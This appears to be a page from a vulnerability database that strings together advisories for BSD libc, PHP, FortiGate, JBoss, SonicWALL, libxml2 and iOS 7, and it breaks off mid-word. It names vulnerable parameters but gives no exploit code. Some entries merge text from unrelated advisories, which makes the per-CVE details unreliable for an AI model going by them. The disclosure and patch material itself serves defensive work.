VARIoT IoT vulnerabilities database

regcomp in the BSD implementation of libc is vulnerable to denial of service due to stack exhaustion. PHP is prone to an 'open_basedir' restriction-bypass vulnerability because of a design error. Successful exploits could allow an attacker to read and write files in unauthorized locations. This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code. In such cases, 'open_basedir' restrictions are expected to isolate users from each other. PHP 5.2.11 and 5.3.0 are vulnerable; other versions may also be affected. Successful exploits will allow attackers to make the applications that use the affected library, unresponsive, denying service to legitimate users. The libc library of the following platforms are affected: NetBSD 5.1 OpenBSD 5.0 FreeBSD 8.2 Apple Mac OSX Other versions may also be affected. NetBSD is a free and open source Unix-like operating system developed by the NetBSD Foundation

Multiple cross-site scripting (XSS) vulnerabilities in Fortinet FortiGate UTM WAF appliances with FortiOS 4.3.x before 4.3.6 allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) Endpoint Monitor, (2) Dialup List, or (3) Log&Report Display modules, or the fields_sorted_opt parameter to (4) user/auth/list or (5) endpointcompliance/app_detect/predefined_sig_list. Fortinet FortiOS Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Fortinet FortiGate UTM WAF appliances is a firewall device from Fortinet. FortiOS is an operating system that runs on it. Remote attackers can exploit this vulnerability to inject arbitrary Web scripts or HTML. Title: ====== Fortigate UTM WAF Appliance - Multiple Web Vulnerabilities Date: ===== 2012-01-27 References: =========== http://vulnerability-lab.com/get_content.php?id=144 VL-ID: ===== 144 Introduction: ============= The FortiGate series of multi-threat security systems detect and eliminate the most damaging, content-based threats from email and Web traffic such as viruses, worms, intrusions, inappropriate Web content and more in real time - without degrading network performance. Ranging from the FortiGate-30 series for small offices to the FortiGate-5000 series for large enterprises, service providers and carriers, the FortiGate line combines the FortiOS™ security operating system with FortiASIC processors and other hardware to provide a comprehensive and high-performance array of security and networking functions including: * Firewall, VPN, and Traffic Shaping * Intrusion Prevention System (IPS) * Antivirus/Antispyware/Antimalware * Web Filtering * Antispam * Application Control (e.g., IM and P2P) * VoIP Support (H.323. and SCCP) * Layer 2/3 routing * Multiple WAN interface options FortiGate appliances provide cost-effective, comprehensive protection against network, content, and application-level threats - including complex attacks favored by cybercriminals - without degrading network availability and uptime. FortiGate platforms incorporate sophisticated networking features, such as high availability (active/active, active/passive) for maximum network uptime, and virtual domain (VDOM) capabilities to separate various networks requiring different security policies. (Copy from the Vendor Homepage: http://www.fortinet.com/products/fortigate/ && http://www.avfirewalls.com/) Abstract: ========= 1.1 Vulnerability-Lab Team discovered multiple persistent Web Vulnerabilities on the FortiGate UTM Appliance Application. 1.2 Vulnerability-Lab Team discovered multiple non-persistent Web Vulnerabilities on the FortiGate UTM Appliance Application. Report-Timeline: ================ 2012-01-27: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== 1.1 Multiple input validation vulnerabilities(persistent) are detected on FortGate UTM Appliance Series. Remote attacker can include (persistent) malicious script code to manipulate specific customer/admin requests. The vulnerability allows an local low privileged attacker to manipulate the appliance(application) via persistent script code inject. It is also possible to hijack customer sessions via persistent script code execution on application side. Successful exploitation can also result in content/module request manipulation, execution of persistent malicious script code, session hijacking, account steal & phishing. Vulnerable Module(s): (Persistent) [+] Endpoint => Monitor => Endpoint Monitor [+] Dailup List [+] Log&Report => Display Picture(s): ../ive2.png ../ive3.png 1.2 Multiple input validation vulnerabilities(non-persistent) are detected on FortGate UTM Appliance Series. The vulnerability allows remote attackers to hijack admin/customer sessions with required user inter action (client-side). Successful exploitation allows to phish user accounts, redirect over client side requests or manipulate website context on client-side browser requests. Vulnerable Module(s): (Non-Persistent) [+] Endpoint -> NAC -> Application Database -> Listings [+] List field sorted Picture(s): ../ive1.png Proof of Concept: ================= The vulnerabilities can be exploited by remote attackers with or without user inter action. For demonstration or reproduce ... poc: => http://www.vulnerability-lab.com/get_content.php?id=144 Solution: ========= 1.1 To fix/patch the persistent input validation vulnerabilities restrict the input fields & parse the input. Locate the vulnerable area(s) reproduce the bugs & parse the output after a malicious(test) insert. Setup a filter or restriction mask to prevent against future persistent input validation attacks. 1.2 To fix the client side input validation vulnerability parse the vulnerable request by filtering the input & cleanup the output. Set a input restriction or configure whitelist/filter to stop client side requests and form a secure exception-handling around. Risk: ===== 1.1 The security risk of the persistent vulnerabilities are estimated as high because of multiple persistent input validation vulnerabilities on different modules. 1.2 The security risk of the non-persistent cross site requests are estimated as low because of required user inter-action to hijack a not expired session. Credits: ======== Vulnerability Research Laboratory - Benjamin Kunz Mejri (Rem0ve) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability- Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers. Copyright © 2012|Vulnerability-Lab -- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: admin@vulnerability-lab.com or support@vulnerability-lab.com . ---------------------------------------------------------------------- SC Magazine awards the Secunia CSI a 5-Star rating Top-level rating for ease of use, performance, documentation, support, and value for money. Read more and get a free trial here: http://secunia.com/blog/296 ---------------------------------------------------------------------- TITLE: JBoss Multiple Products JMX Console Authentication Bypass SECUNIA ADVISORY ID: SA47850 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/47850/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=47850 RELEASE DATE: 2012-02-06 DISCUSS ADVISORY: http://secunia.com/advisories/47850/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/47850/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=47850 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A security issue has been reported in multiple JBoss products, which can be exploited by malicious people to bypass certain security restrictions. The security issue is caused due to improper access restrictions to the JMX Console. For more information see vulnerability #1 in: SA39563 The security issue is reported in the following products: * JBoss Communications Platform 1.2 * JBoss Enterprise Application Platform 5.0 and 5.0.1 * JBoss Enterprise Portal Platform 4.3 * JBoss Enterprise Web Platform 5.0 * JBoss SOA-Platform 4.2, 4.3, and 5.0 SOLUTION: Update to a fixed version. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ORIGINAL ADVISORY: JBPAPP-3952: https://issues.jboss.org/browse/JBPAPP-3952 JBPAPP-4713: https://issues.jboss.org/browse/JBPAPP-4713 Red Hat Doc#30741: https://access.redhat.com/kb/docs/DOC-30741 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

SQL injection vulnerability in prodpage.cfm in SonicWALL Aventail allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter. SonicWALL Aventail is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Further research conducted by the vendor indicates this issue may not be a vulnerability affecting the application. SonicWALL is a full-featured Internet security appliance designed specifically for large networks with ever-growing VPN needs

libxml2 before 2.8.0 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted XML data. libxml2 is prone to a denial-of-service vulnerability. An attacker can exploit this issue by sending specially crafted requests to the affected application that uses a hash table. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. The vulnerability is caused by the program calculating the hash value without pre-limiting the hash collision. An attacker with a privileged network position may inject arbitrary contents. This issue was addressed by using an encrypted HTTPS connection to retrieve tutorials. ============================================================================ Ubuntu Security Notice USN-1376-1 February 27, 2012 libxml2 vulnerability ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS - Ubuntu 8.04 LTS Summary: libxml2 could be made to cause a denial of service by consuming excessive CPU resources. Software Description: - libxml2: GNOME XML library Details: Juraj Somorovsky discovered that libxml2 was vulnerable to hash table collisions. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: libxml2 2.7.8.dfsg-4ubuntu0.2 Ubuntu 11.04: libxml2 2.7.8.dfsg-2ubuntu0.3 Ubuntu 10.10: libxml2 2.7.7.dfsg-4ubuntu0.4 Ubuntu 10.04 LTS: libxml2 2.7.6.dfsg-1ubuntu1.4 Ubuntu 8.04 LTS: libxml2 2.6.31.dfsg-2ubuntu1.8 After a standard system update you need to reboot your computer to make all the necessary changes. Given an attacker with knowledge of the hashing algorithm, it is possible to craft input that creates a large amount of collisions. As a result it is possible to perform denial of service attacks against applications using libxml2 functionality because of the computational overhead. For the stable distribution (squeeze), this problem has been fixed in version 2.7.8.dfsg-2+squeeze3. For the testing (wheezy) and unstable (sid) distributions, this problem will be fixed soon. We recommend that you upgrade your libxml2 packages. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . Background ========== libxml2 is the XML C parser and toolkit developed for the Gnome project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/libxml2 < 2.7.8-r5 >= 2.7.8-r5 Description =========== libxml2 does not properly randomize hash functions to protect against hash collision attacks. Workaround ========== There is no known workaround at this time. Resolution ========== All libxml2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.7.8-r5" References ========== [ 1 ] CVE-2012-0841 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0841 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201203-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . The verification of md5 checksums and GPG signatures is performed automatically for you. Relevant releases ESX 5.0 without patch ESXi500-201207101-SG 3. Problem Description a. ESXi update to third party component libxml2 The libxml2 third party library has been updated which addresses multiple security issues The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-4008, CVE-2010-4494, CVE-2011-0216, CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919 and CVE-2012-0841 to these issues. The following table lists what action remediates the vulnerability (column 4) if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ========== ======== ======== ================= vCenter any Windows not affected hosted * any any not affected ESXi 5.0 any ESXi500-201207101-SG ESXi 4.1 any patch pending ESXi 4.0 any patch pending ESXi 3.5 any patch pending ESX any any not applicable * hosted products are VMware Workstation, Player, ACE, Fusion. Note: "patch pending" means that the product is affected, but no patch is currently available. The advisory will be updated when a patch is available. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. ESXi 5.0 -------- ESXi500-201207001 md5sum: 01196c5c1635756ff177c262cb69a848 sha1sum: 85936f5439100cd5fb55c7add574b5b3b937fe86 http://kb.vmware.com/kb/2020571 ESXi500-201207001 contains ESXi500-201207101-SG 5. Change log 2012-07-12 VMSA-2012-0012 Initial security advisory in conjunction with the release of a patch for ESXi 5.0 on 2012-07-12. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html Copyright 2012 VMware Inc. All rights reserved. ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Avaya Voice Portal Multiple Vulnerabilities SECUNIA ADVISORY ID: SA50614 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/50614/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=50614 RELEASE DATE: 2012-09-21 DISCUSS ADVISORY: http://secunia.com/advisories/50614/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/50614/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=50614 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Avaya has acknowledged a weakness and multiple vulnerabilities in Avaya Voice Portal, which can be exploited by malicious, local users to disclose system and sensitive information and by malicious people to bypass certain security restrictions and cause a DoS (Denial of Service). For more information: SA44490 SA46460 SA46958 SA48000 The weakness and vulnerabilities are reported in versions 5.0, 5.1, 5.1.1, and 5.1.2. SOLUTION: Update to Avaya Enterprise Linux for Voice Portal 5.1.3 and Voice Portal 5.1.3. ORIGINAL ADVISORY: Avaya (ASA-2011-154, ASA-2012-137, ASA-2012-139, ASA-2012-166, ASA-2012-207): https://downloads.avaya.com/css/P8/documents/100141102 https://downloads.avaya.com/css/P8/documents/100160023 https://downloads.avaya.com/css/P8/documents/100160589 https://downloads.avaya.com/css/P8/documents/100160780 https://downloads.avaya.com/css/P8/documents/100162507 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Summary: Updated mingw32-libxml2 packages that fix several security issues are now available for Red Hat Enterprise Linux 6. This advisory also contains information about future updates for the mingw32 packages, as well as the deprecation of the packages with the release of Red Hat Enterprise Linux 6.4. The Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Optional (v. 6) - noarch Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch Red Hat Enterprise Linux Server Optional (v. 6) - noarch Red Hat Enterprise Linux Workstation Optional (v. 6) - noarch 3. Description: These packages provide the libxml2 library, a development toolbox providing the implementation of various XML standards, for users of MinGW (Minimalist GNU for Windows). IMPORTANT NOTE: The mingw32 packages in Red Hat Enterprise Linux 6 will no longer be updated proactively and will be deprecated with the release of Red Hat Enterprise Linux 6.4. These packages were provided to support other capabilities in Red Hat Enterprise Linux and were not intended for direct customer use. Customers are advised to not use these packages with immediate effect. Future updates to these packages will be at Red Hat's discretion and these packages may be removed in a future minor release. A heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-3919) A heap-based buffer underflow flaw was found in the way libxml2 decoded certain entities. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2012-5134) It was found that the hashing routine used by libxml2 arrays was susceptible to predictable hash collisions. Sending a specially-crafted message to an XML service could result in longer processing time, which could lead to a denial of service. To mitigate this issue, randomization has been added to the hashing function to reduce the chance of an attacker successfully causing intentional collisions. (CVE-2012-0841) Multiple flaws were found in the way libxml2 parsed certain XPath (XML Path Language) expressions. If an attacker were able to supply a specially-crafted XML file to an application using libxml2, as well as an XPath expression for that application to run against the crafted file, it could cause the application to crash. (CVE-2010-4008, CVE-2010-4494, CVE-2011-2821, CVE-2011-2834) Two heap-based buffer overflow flaws were found in the way libxml2 decoded certain XML files. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. (CVE-2011-0216, CVE-2011-3102) An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libxml2 parsed certain XPath expressions. If an attacker were able to supply a specially-crafted XML file to an application using libxml2, as well as an XPath expression for that application to run against the crafted file, it could cause the application to crash or, possibly, execute arbitrary code. (CVE-2011-1944) An out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash. Upstream acknowledges Bui Quang Minh from Bkis as the original reporter of CVE-2010-4008. All users of mingw32-libxml2 are advised to upgrade to these updated packages, which contain backported patches to correct these issues. 4. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 645341 - CVE-2010-4008 libxml2: Crash (stack frame overflow or NULL pointer dereference) by traversal of XPath axis 665963 - CVE-2010-4494 libxml2: double-free in XPath processing code 709747 - CVE-2011-1944 libxml, libxml2: Heap-based buffer overflow by adding new namespace node to an existing nodeset or merging nodesets 724906 - CVE-2011-0216 libxml2: Off-by-one error leading to heap-based buffer overflow in encoding 735712 - CVE-2011-2821 libxml2: double free caused by malformed XPath expression in XSLT 735751 - CVE-2011-2834 libxml2: double-free caused by malformed XPath expression in XSLT 767387 - CVE-2011-3905 libxml2 out of bounds read 771896 - CVE-2011-3919 libxml2: Heap-based buffer overflow when decoding an entity reference with a long name 787067 - CVE-2012-0841 libxml2: hash table collisions CPU usage DoS 822109 - CVE-2011-3102 libxml: An off-by-one out-of-bounds write by XPointer part evaluation 880466 - CVE-2012-5134 libxml2: Heap-buffer-underflow in xmlParseAttValueComplex 6. Package List: Red Hat Enterprise Linux Desktop Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm Red Hat Enterprise Linux HPC Node Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm Red Hat Enterprise Linux Server Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm Red Hat Enterprise Linux Workstation Optional (v. 6): Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/mingw32-libxml2-2.7.6-6.el6_3.src.rpm noarch: mingw32-libxml2-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-debuginfo-2.7.6-6.el6_3.noarch.rpm mingw32-libxml2-static-2.7.6-6.el6_3.noarch.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2010-4008.html https://www.redhat.com/security/data/cve/CVE-2010-4494.html https://www.redhat.com/security/data/cve/CVE-2011-0216.html https://www.redhat.com/security/data/cve/CVE-2011-1944.html https://www.redhat.com/security/data/cve/CVE-2011-2821.html https://www.redhat.com/security/data/cve/CVE-2011-2834.html https://www.redhat.com/security/data/cve/CVE-2011-3102.html https://www.redhat.com/security/data/cve/CVE-2011-3905.html https://www.redhat.com/security/data/cve/CVE-2011-3919.html https://www.redhat.com/security/data/cve/CVE-2012-0841.html https://www.redhat.com/security/data/cve/CVE-2012-5134.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2013-09-18-2 iOS 7 iOS 7 is now available and addresses the following: Certificate Trust Policy Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Root certificates have been updated Description: Several certificates were added to or removed from the list of system roots. CoreGraphics Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of JBIG2 encoded data in PDF files. This issue was addressed through additional bounds checking. CVE-ID CVE-2013-1025 : Felix Groebert of the Google Security Team CoreMedia Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Playing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of Sorenson encoded movie files. This issue was addressed through improved bounds checking. CVE-ID CVE-2013-1019 : Tom Gallagher (Microsoft) & Paul Bates (Microsoft) working with HP's Zero Day Initiative Data Protection Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Apps could bypass passcode-attempt restrictions Description: A privilege separation issue existed in Data Protection. An app within the third-party sandbox could repeatedly attempt to determine the user's passcode regardless of the user's "Erase Data" setting. This issue was addressed by requiring additional entitlement checks. CVE-ID CVE-2013-0957 : Jin Han of the Institute for Infocomm Research working with Qiang Yan and Su Mon Kywe of Singapore Management University Data Security Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: TrustWave, a trusted root CA, has issued, and subsequently revoked, a sub-CA certificate from one of its trusted anchors. This sub-CA facilitated the interception of communications secured by Transport Layer Security (TLS). This update added the involved sub-CA certificate to OS X's list of untrusted certificates. CVE-ID CVE-2013-5134 dyld Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker who has arbitrary code execution on a device may be able to persist code execution across reboots Description: Multiple buffer overflows existed in dyld's openSharedCacheFile() function. These issues were addressed through improved bounds checking. CVE-ID CVE-2013-3950 : Stefan Esser File Systems Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker who can mount a non-HFS filesystem may be able to cause an unexpected system termination or arbitrary code execution with kernel privileges Description: A memory corruption issue existed in the handling of AppleDouble files. This issue was addressed by removing support for AppleDouble files. CVE-ID CVE-2013-3955 : Stefan Esser ImageIO Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of JPEG2000 encoded data in PDF files. This issue was addressed through additional bounds checking. CVE-ID CVE-2013-1026 : Felix Groebert of the Google Security Team IOKit Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Background applications could inject user interface events into the foreground app Description: It was possible for background applications to inject user interface events into the foreground application using the task completion or VoIP APIs. This issue was addressed by enforcing access controls on foreground and background processes that handle interface events. CVE-ID CVE-2013-5137 : Mackenzie Straight at Mobile Labs IOKitUser Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious local application could cause an unexpected system termination Description: A null pointer dereference existed in IOCatalogue. The issue was addressed through additional type checking. CVE-ID CVE-2013-5138 : Will Estes IOSerialFamily Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Executing a malicious application may result in arbitrary code execution within the kernel Description: An out of bounds array access existed in the IOSerialFamily driver. This issue was addressed through additional bounds checking. CVE-ID CVE-2013-5139 : @dent1zt IPSec Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker may intercept data protected with IPSec Hybrid Auth Description: The DNS name of an IPSec Hybrid Auth server was not being matched against the certificate, allowing an attacker with a certificate for any server to impersonate any other. This issue was addressed by improved certificate checking. CVE-ID CVE-2013-1028 : Alexander Traud of www.traud.de Kernel Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A remote attacker can cause a device to unexpectedly restart Description: Sending an invalid packet fragment to a device can cause a kernel assert to trigger, leading to a device restart. The issue was addressed through additional validation of packet fragments. CVE-ID CVE-2013-5140 : Joonas Kuorilehto of Codenomicon, an anonymous researcher working with CERT-FI, Antti LevomAki and Lauri Virtanen of Vulnerability Analysis Group, Stonesoft Kernel Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious local application could cause device hang Description: An integer truncation vulnerability in the kernel socket interface could be leveraged to force the CPU into an infinite loop. The issue was addressed by using a larger sized variable. CVE-ID CVE-2013-5141 : CESG Kernel Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker on a local network can cause a denial of service Description: An attacker on a local network can send specially crafted IPv6 ICMP packets and cause high CPU load. The issue was addressed by rate limiting ICMP packets before verifying their checksum. CVE-ID CVE-2011-2391 : Marc Heuse Kernel Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Kernel stack memory may be disclosed to local users Description: An information disclosure issue existed in the msgctl and segctl APIs. This issue was addressed by initializing data structures returned from the kernel. CVE-ID CVE-2013-5142 : Kenzley Alphonse of Kenx Technology, Inc Kernel Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Unprivileged processes could get access to the contents of kernel memory which could lead to privilege escalation Description: An information disclosure issue existed in the mach_port_space_info API. This issue was addressed by initializing the iin_collision field in structures returned from the kernel. CVE-ID CVE-2013-3953 : Stefan Esser Kernel Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Unprivileged processes may be able to cause an unexpected system termination or arbitrary code execution in the kernel Description: A memory corruption issue existed in the handling of arguments to the posix_spawn API. This issue was addressed through additional bounds checking. CVE-ID CVE-2013-3954 : Stefan Esser Kext Management Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An unauthorized process may modify the set of loaded kernel extensions Description: An issue existed in kextd's handling of IPC messages from unauthenticated senders. This issue was addressed by adding additional authorization checks. CVE-ID CVE-2013-5145 : "Rainbow PRISM" libxml Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libxml. These issues were addressed by updating libxml to version 2.9.0. CVE-ID CVE-2011-3102 : Juri Aedla CVE-2012-0841 CVE-2012-2807 : Juri Aedla CVE-2012-5134 : Google Chrome Security Team (Juri Aedla) libxslt Available for: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Viewing a 